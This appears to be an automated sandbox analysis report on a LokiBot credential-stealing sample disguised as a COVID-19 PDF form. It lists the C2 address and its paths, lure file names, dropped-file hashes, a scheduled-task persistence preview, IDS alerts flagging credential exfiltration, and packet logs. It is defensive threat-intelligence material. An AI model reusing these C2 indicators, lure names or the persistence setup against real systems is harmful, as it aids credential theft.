                                        63.141.228.141 | #U00c1raj#U00e1nlat k#U00e9r#U00e9se 29#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141/32.php/S7zr5v1fXI3Rb
                                        63.141.228.141 | wininit.exe | malicious | 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        63.141.228.141 | oyVktvL5Es.exe | malicious | 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        63.141.228.141 | Quotation of Medical-105.pdf.exe | malicious | 63.141.228.141/32.php/pydAkox9ETY5Y
                                        63.141.228.141 | gunzipped.exe | malicious | 63.141.228.141/32.php/BMnWlQ62x3Dhz
                                        63.141.228.141 | Proforma Invoice.exe | malicious | 63.141.228.141/32.php/pydAkox9ETY5Y
                                        63.141.228.141 | i0GOFEs5MgSta4n.exe | malicious | 63.141.228.141/32.php/L6J4kh5OOGtJ5
                                        63.141.228.141 | Ij5nHFBTiajpgfL.exe | malicious | 63.141.228.141/32.php/6mr5C1QFWrZ4O
                                        63.141.228.141 | BlNBNJ41KC.exe | malicious | 63.141.228.141/32.php/YjfkU88ZV6lc0
                                        63.141.228.141 | purchase inquiry.exe | malicious | 63.141.228.141/32.php/cLsdqrHIILVB5
                                        63.141.228.141 | 0B7mA6tYHm.exe | malicious | 63.141.228.141/32.php/W2gf0zvk0cV5n

                                        Domains

                                        No context

                                        ASN

                                        Match | Associated Sample Name / URL | Detection | Context
                                        NOCIXUS | IcTsYNL7h3.exe | malicious | 63.141.228.141
                                        NOCIXUS | CMA - customer Advisory - Container Charges.pdf.exe | malicious | 63.141.228.141
                                        NOCIXUS | cotizaci#U00f3n.pdf.exe | malicious | 63.141.228.141
                                        NOCIXUS | facturas y datos bancarios.PDF____________________________________.exe | malicious | 63.141.228.141
                                        NOCIXUS | http___103.89.90.94_hthp_wininit.exe | malicious | 63.141.228.141
                                        NOCIXUS | g0-core-ofr-gogreen-plus-infographic.pdf.exe | malicious | 63.141.228.141
                                        NOCIXUS | datos bancarios y facturaa.pdf____________________________________________________.exe | malicious | 63.141.228.141
                                        NOCIXUS | gunzipped.exe | malicious | 63.141.228.141
                                        NOCIXUS | PaymentConfirmation.pdf.exe | malicious | 192.187.111.220
                                        NOCIXUS | SecuriteInfo.com.Trojan.Win32.Save.a.16492.exe | malicious | 63.141.228.141
                                        NOCIXUS | #U00c1raj#U00e1nlat k#U00e9r#U00e9se 29#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141
                                        NOCIXUS | wininit.exe | malicious | 63.141.228.141
                                        NOCIXUS | oyVktvL5Es.exe | malicious | 63.141.228.141
                                        NOCIXUS | Quotation of Medical-105.pdf.exe | malicious | 63.141.228.141
                                        NOCIXUS | gunzipped.exe | malicious | 63.141.228.141
                                        NOCIXUS | Proforma Invoice.exe | malicious | 63.141.228.141
                                        NOCIXUS | i0GOFEs5MgSta4n.exe | malicious | 63.141.228.141
                                        NOCIXUS | Ij5nHFBTiajpgfL.exe | malicious | 63.141.228.141
                                        NOCIXUS | BlNBNJ41KC.exe | malicious | 63.141.228.141
                                        NOCIXUS | purchase inquiry.exe | malicious | 63.141.228.141

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.log
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1640
                                        Entropy (8bit):5.190304818792931
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBAtn:cbh47TlNQ//rydbz9I3YODOLNdq3Y
                                        MD5:F73872B63B266AFAFA99963F04D01A52
                                        SHA1:9D63EF99D643DB7666E16C2FB91D6E7867682240
                                        SHA-256:AA84922BAC808392632A0865DFC1897AAC611A5D4E3BF1D8035F1C0495D6158D
                                        SHA-512:70C3BEE130D29B53443F66F503B1976BCF5934A04A3CF21A67457658BBD32527EBD72FC42A226D3B7C1A74FD5095CD705EABDD174B431C4DC64EE7BBA4B8A5ED
                                        Malicious:true
                                        Reputation:low
                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 1
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):782
                                        Entropy (8bit):0.6303266404701133
                                        Encrypted:false
                                        SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbON:u
                                        MD5:FF9627A22D5DADFECE3CEF2DDB25DA77
                                        SHA1:436098FB479AF2C7D4AFFFDD3AB473ABB9C0DACB
                                        SHA-256:EE69C77BF8B4528A01D97975F6120BD1C7043FDBF9464E2B3B1C7E4CAAC2E06F
                                        SHA-512:1CDAFD7571755D0C534E14559B78AEFB5567012BC7C1962B5D41C868168EDE0DC2FD68A651FEFB6C0E3D0C7483CC07A5D374176C2400D78EC4B6C800495389BD
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                                        C:\Users\user\AppData\Roaming\qvDFOnW.exe
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1109504
                                        Entropy (8bit):5.548871791041164
                                        Encrypted:false
                                        SSDEEP:12288:LHvr5hzhEZ66mE9GXlGxPvL+LI0Iyi/DnyqTts7RAV8hh:Lv9hzhkME9cEFzUI0Iyi/7vmaWhh
                                        MD5:EA646520496FD4603AAF0F5778231F0D
                                        SHA1:5112F3F6AE6A8A7CFAC8364433128228C450F203
                                        SHA-256:A130CF9DF18F1AE304826C98D4E7CFD2E75043B126A1DF0C0A36F98A64CDE5C2
                                        SHA-512:6F5F8F1312B9E2B98F5A4E415C41BC5CA35FB762D0F328C5056A844AA1FBA2DF7FBEE3550D4870EFA43483AF9131B256435070A6D6C1A7C3B1622A4C8678723C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 35%
                                        • Antivirus: ReversingLabs, Detection: 20%
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.`.............................(... ...@....@.. .......................`............@..................................'..K....`.......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\qvDFOnW.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.548871791041164
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        File name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File size:1109504
                                        MD5:ea646520496fd4603aaf0f5778231f0d
                                        SHA1:5112f3f6ae6a8a7cfac8364433128228c450f203
                                        SHA256:a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
                                        SHA512:6f5f8f1312b9e2b98f5a4e415c41bc5ca35fb762d0f328c5056a844aa1fba2df7fbee3550d4870efa43483af9131b256435070a6d6c1a7c3b1622a4c8678723c
                                        SSDEEP:12288:LHvr5hzhEZ66mE9GXlGxPvL+LI0Iyi/DnyqTts7RAV8hh:Lv9hzhkME9cEFzUI0Iyi/7vmaWhh
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.`.............................(... ...@....@.. .......................`............@................................

                                        File Icon

                                        Icon Hash:7069696969616971

                                        Static PE Info

                                        General

                                        Entrypoint:0x4e280e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60DD43B5 [Thu Jul 1 04:25:25 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe27c0 | 0x4b | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe6000 | 0x2da98 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x114000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xe0814 | 0xe0a00 | False | 0.606676274694 | SysEx File - Jellinghaus | 6.10267002947 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .sdata | 0xe4000 | 0x1e8 | 0x200 | False | 0.861328125 | data | 6.62657070624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xe6000 | 0x2da98 | 0x2dc00 | False | 0.163096610314 | data | 2.30003219399 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x114000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_ICON | 0xe6460 | 0x2868 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0 | |
                                        RT_ICON | 0xe8cc8 | 0x16e8 | dBase IV DBT of \300.DBF, block length 4608, next free block index 40, next free block 0, next used block 0 | |
                                        RT_ICON | 0xea3b0 | 0x668 | data | |
                                        RT_ICON | 0xeaa18 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 13107200, next used block 0 | |
                                        RT_ICON | 0xead00 | 0x1e8 | data | |
                                        RT_ICON | 0xeaee8 | 0x128 | GLS_BINARY_LSB_FIRST | |
                                        RT_ICON | 0xeb010 | 0x4c28 | dBase IV DBT, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                        RT_ICON | 0xefc38 | 0x2ca8 | dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                        RT_ICON | 0xf28e0 | 0xea8 | data | |
                                        RT_ICON | 0xf3788 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | |
                                        RT_ICON | 0xf4030 | 0x6c8 | data | |
                                        RT_ICON | 0xf46f8 | 0x568 | GLS_BINARY_LSB_FIRST | |
                                        RT_ICON | 0xf4c60 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
                                        RT_ICON | 0x105488 | 0x94a8 | data | |
                                        RT_ICON | 0x10e930 | 0x25a8 | data | |
                                        RT_ICON | 0x110ed8 | 0x10a8 | data | |
                                        RT_ICON | 0x111f80 | 0x988 | data | |
                                        RT_ICON | 0x112908 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                        RT_GROUP_ICON | 0x112d70 | 0x102 | data | |
                                        RT_VERSION | 0x112e74 | 0x380 | data | |
                                        RT_MANIFEST | 0x1131f4 | 0x8a3 | XML 1.0 document, UTF-8 Unicode (with BOM) text | |

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright GabSoftware 2009
                                        Assembly Version1.0.1.0
                                        InternalNameInt16ArrayTypeInfo.exe
                                        FileVersion1.0.1.0
                                        CompanyNameGabSoftware
                                        LegalTrademarks
                                        Comments
                                        ProductNameGabCopyPaste
                                        ProductVersion1.0.1.0
                                        FileDescriptionGabCopyPaste
                                        OriginalFilenameInt16ArrayTypeInfo.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/01/21-14:36:31.408982 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49715 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:31.408982 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49715 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:31.408982 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49715 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:31.408982 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49715 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:32.663221 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49717 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:32.663221 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49717 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:32.663221 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49717 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:32.663221 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49717 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:33.952661 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49719 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:33.952661 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49719 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:33.952661 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49719 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:33.952661 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49719 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:35.267014 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49720 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:35.267014 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49720 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:35.267014 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49720 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:35.267014 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49720 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:36.486136 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49721 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:36.486136 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49721 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:36.486136 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49721 | 80 | 192.168.2.3 | 63.141.228.141
07/01/21-14:36:36.486136 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49721 | 80 | 192.168.2.3 | 63.141.228.141

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2021 14:36:31.244998932 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:31.401983976 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:31.405318975 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:31.408982038 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:31.564255953 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:31.564367056 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:31.721736908 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256418943 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256474972 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256511927 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256548882 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256587029 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256623030 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256623030 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.256659985 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256659985 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.256689072 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.256696939 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.256768942 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.256881952 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.265707016 CEST | 80 | 49715 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.266645908 CEST | 49715 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.501713037 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.657932043 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.658143997 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.663220882 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.819720030 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:32.819875956 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:32.978811979 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568382978 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568468094 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568520069 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568566084 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568645954 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568691969 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568737030 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568780899 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.568964005 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.568994045 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.568996906 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.568999052 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.569153070 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.577445984 CEST | 80 | 49717 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.577622890 CEST | 49717 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.787909031 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.948501110 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:33.950041056 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:33.952661037 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:34.112454891 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.113523006 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:34.275362968 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788209915 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788239002 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788250923 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788266897 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788281918 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788295984 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788311005 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788325071 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.788336039 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:34.788417101 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:34.788491011 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:34.796504021 CEST | 80 | 49719 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:34.796613932 CEST | 49719 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:35.105285883 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:35.263746023 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:35.263948917 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:35.267014027 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:35.425731897 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
